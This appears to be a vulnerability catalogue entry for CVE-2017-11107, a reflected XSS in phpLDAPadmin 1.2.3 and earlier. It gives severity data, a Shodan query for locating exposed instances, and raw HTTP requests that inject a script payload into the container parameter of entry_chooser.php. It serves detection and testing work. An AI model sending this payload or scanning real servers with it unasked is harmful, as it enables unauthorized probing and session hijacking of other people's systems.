| Title | phpLDAPadmin <= 1.2.3 - Reflected XSS |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | Attackers can execute malicious scripts in victim browsers, potentially leading to session hijacking or defacement. |
| Remediation | Update to the latest version of phpLDAPadmin where the vulnerability is fixed. |
| CVSS Score | 6.1 |
| EPSS Score | 0.00193 |
| CVE ID | CVE-2017-11107 |
| CWE ID | CWE-79 |
| Shodan Query | html:"phpLDAPadmin" |
| Tags | cve cve2017 phpldapadmin xss unauth |
phpLDAPadmin <= 1.2.3 contains a reflected cross-site scripting caused by unsanitized input in htdocs/entry_chooser.php via the form, element, rdn, or container parameter, letting attackers execute malicious scripts in victim browsers, exploit requires sending crafted input.
GET /phpldapadmin/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /phpldapadmin/entry_chooser.php?container=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-11107.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-11107.pcap
N/AN/A